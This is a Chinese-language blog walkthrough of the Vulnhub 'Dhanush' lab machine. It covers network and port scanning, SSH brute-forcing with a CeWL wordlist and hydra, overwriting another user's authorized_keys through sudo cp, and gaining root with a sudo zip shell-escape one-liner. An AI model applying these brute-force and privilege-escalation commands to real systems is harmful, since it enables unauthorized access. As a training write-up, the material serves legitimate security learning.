首页 > 其他分享 >Vulnhub之Dhanush靶机测试过程

Vulnhub之Dhanush靶机测试过程

时间:2023-07-12 15:35:25浏览次数:40  
标签:Dhanush kali 187.155 192.168 Vulnhub https ubuntu 靶机 root

Dhanush

识别目标主机IP地址

(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ sudo netdiscover -i eth1 -r 192.168.187.0/24 
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                  
                                                                                                                                                
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.187.1   00:50:56:c0:00:01      2     120  VMware, Inc.                                                                                 
 192.168.187.155 00:0c:29:ab:6e:4f      2     120  VMware, Inc.                                                                                 
 192.168.187.254 00:50:56:e2:20:55      1      60  VMware, Inc.          

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ sudo nmap -sS -sV -sC -p- 192.168.187.155 -oN nmap_full_scan                                                                           130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-07-12 02:46 EDT
Nmap scan report for 192.168.187.155
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Dhanush
|_http-server-header: Apache/2.4.29 (Ubuntu)
65345/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:2f:3d:dd:ac:42:d4:d5:de:ec:9b:19:0b:45:3e:13 (RSA)
|   256 89:02:8d:a5:e0:75:a5:34:3b:52:3a:6c:d1:f4:05:da (ECDSA)
|_  256 ea:af:62:07:73:d0:d5:1e:fb:a9:12:62:34:27:52:d9 (ED25519)
MAC Address: 00:0C:29:AB:6E:4F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


获得Shell

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ curl http://192.168.187.155/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.187.155 Port 80</address>
</body></html>
                          

目标不存在robots.txt文件

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ nikto -h http://192.168.187.155
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.187.155
+ Target Hostname:    192.168.187.155
+ Target Port:        80
+ Start Time:         2023-07-12 02:48:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 15a4, size: 596d81d0365ae, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-07-12 02:48:42 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

nikto工具没有扫描出有价值的信息。

目录扫描没有任何收获。

创建字典,看是否可以破解ssh用户名与口令:

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ cewl -d 3 http://192.168.187.155 -w dict.txt
CeWL 5.5.2 (Grouping) Robin Wood ([email protected]) (https://digi.ninja/)
                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ wc -l dict.txt 
114 dict.txt
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ hydra -L dict.txt -P dict.txt ssh://192.168.187.155 -s 65345        

破解得到用户名密码为pinak/Gandiv

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ ssh [email protected] -p 65345              
The authenticity of host '[192.168.187.155]:65345 ([192.168.187.155]:65345)' can't be established.
ED25519 key fingerprint is SHA256:MZF9Ir9Jya9Ybbdt2/YwEoX+fcFSl7U+HZU/4UcvdrY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.187.155]:65345' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Wed Feb 15 05:02:20 2023 from 10.1.1.143
pinak@ubuntu:~$ ls -alh

提权

pinak@ubuntu:~$ sudo -l
Matching Defaults entries for pinak on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pinak may run the following commands on ubuntu:
    (sarang) NOPASSWD: /bin/cp
pinak@ubuntu:~$ 

pinak@ubuntu:~$ sudo -u sarang /bin/cp id_rsa.pub /home/sarang/.ssh/authorized_keys
pinak@ubuntu:~$ ssh [email protected] -p 65345
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Feb 15 06:08:49 2023 from 127.0.0.1

根据pinak的.bash_history提示,将其id_rsa.pub文件拷贝到sarang用户的authorized_keys,这样就可以利用其私钥登录sarang的shell了。

sarang@ubuntu:~$ sudo -l
Matching Defaults entries for sarang on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sarang may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/zip
sarang@ubuntu:~$ cd /tmp
sarang@ubuntu:/tmp$ TF=$(mktemp -u)
sarang@ubuntu:/tmp$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# cd /root
# ls -alh
total 24K
drwx------  3 root root 4.0K Nov  8  2019 .
drwxr-xr-x 22 root root 4.0K Nov  8  2019 ..
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
-rw-r--r--  1 root root 1.5K Nov  8  2019 flag.txt
drwxr-xr-x  3 root root 4.0K Nov  7  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
# cat flag.txt
          
                                            @p
                                           @@@.
                                          @@@@@
                                         @@@@@@@
                                        *"`]@P ^^
                                           ]@P
                                           ]@P
                               ,,,,        ]@P       ,,gg,,
                           g@@@@@@@@@b     ]@P    ,@@@@@@@@@@g,
                        ,@@@@@@BNPPNB@@@@@@@@@@@@@@@@P**PNB@@@@@w
                      g@@@@P^`        %NNNNN@NNNNNP          *B@@@g
                    g@@@P`                 -@                   "B@@w
                  ,@@@`                    ]@                      %@@,
                 @@P-                      ]@                        *@@,
              ,@@"                         ]@                          *B@
            ,@N"                          y@@B                            %@,
      ,,  g@P-                            ]@@@P                             *Bg ,gg
      @@@@$,,,,,,,,,,,,,,,,,,,,,,,,,,ggggg@@@@wwwwwwwwwgggggggggww==========mm4NNN"

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Nisha Sharma     : https://in.linkedin.com/in/nishasharmaa

+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|

这样就拿到了root flag和root shell.

经验教训

  1. 本靶机的关键在于生成字典,然后利用hydra破解ssh用户名和密码

标签:Dhanush,kali,187.155,192.168,Vulnhub,https,ubuntu,靶机,root
From: https://www.cnblogs.com/jason-huawen/p/17547600.html

相关文章

  • Vulnhub: Hackable:II靶机
    kali:192.168.111.111靶机:192.168.111.142信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.142网站的files目录ftp存在匿名登录,所在目录为网站的files目录ftp上传反弹shell提权目标根目录下的.runme.shmd5解密后切换到shrek用户s......
  • vulnhub-BossPlayersCTF
    vulnhub-BossPlayersCTF目标IP:192.168.1.103官方难度:简单攻击机器:macOS+kali混搭信息收集端口扫描开放端口扫描nmap-sT-T4-p-192.168.1.103扫描结果StartingNmap7.93(https://nmap.org)at2023-06-0423:10CSTNmapscanreportfor192.168.1.103Hosti......
  • Vulnhub_Zico2_wp
    前言靶机下载地址:https://download.vulnhub.com/zico/zico2.ova主机探测nmap-sn192.168.20.0/24192.168.20.147为靶机ip详细信息扫描nmap-A-p-192.168.20.147点击查看扫描结果┌──(root㉿kali)-[/home/kali/Desktop]└─#nmap-A-p-192.168.20.147Starting......
  • Vulnhub_Acid_wp
    前言靶机下载地址:https://download.vulnhub.com/acid/Acid.rar靶机探测nmap-sn192.168.20.0/24192.168.20.146是新出现得ip所以为靶机ip详细信息扫描nmap-A-p-192.168.20.146漏洞扫描nmapnmap-p33447--script=vuln192.168.20.146niktonikto-h192.168.20.......
  • Vulnhub: EvilBox:One靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130secret目录爆破feroxbuster-k-d1--urlhttp://192.168.111.130/secret/-w/opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-li......
  • vulnhub靶场:EvilBox - One
    下载地址:https://www.vulnhub.com/entry/evilbox-one,736/kali:172.88.6.144靶场:172.88.6.94 nmap-T4-sV-P-A172.88.6.94  用dirbhttp://172.88.6.94和 dirsearch-uhttp://172.88.6.94/ 发现类似的网址  dirbhttp://172.88.6.94/secret/-X.php,......
  • vulnhub靶场:Deathnote
    靶场地址:Deathnote:1~VulnHubKali:172.88.6.144靶场:172.88.6.92arp-scan-l nmap-T4-sV-P-A172.88.6.92  访问web服务时发现会自动跳转到:http://deathnote.vuln/wordpress/页面,但是显示404,想着应该是未配置dns的问题。那就配置下dns信息,win:打开C:\Windows\Syst......
  • vulnhub靶场:doubletrouble
    靶场地址:doubletrouble:1~VulnHubkali:172.88.6.144靶场:172.88.6.89靶场2:172.88.6.91arp-scan-l  nmap-A-sV-T4-p-172.88.6.89 访问ip 使用dirsearch对目标站点进行Web目录爬取dirsearch-uhttp://172.88.6.89/-e*   将图片下载好,放到kali中,自......
  • VulnHub-DC-7渗透流程
    DC-7kali:192.168.157.131靶机:192.168.157.151信息收集nmap-sV-A-p-192.168.157.151虽然有robots.txt等敏感文件泄露但是用处不大,但在网页底部有@dc7user搜索一番,在github找到了他的项目,在config.php内得到了登录用户与密码$username="dc7user";$password="Md......
  • Vulnhub: DarkHole:1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130访问目标web网站,注册用户注册时尝试注册用户名为admin的用户,发现存在该用户进入用户后台,利用burp抓包越权修改其他用户的密码admin用户密码......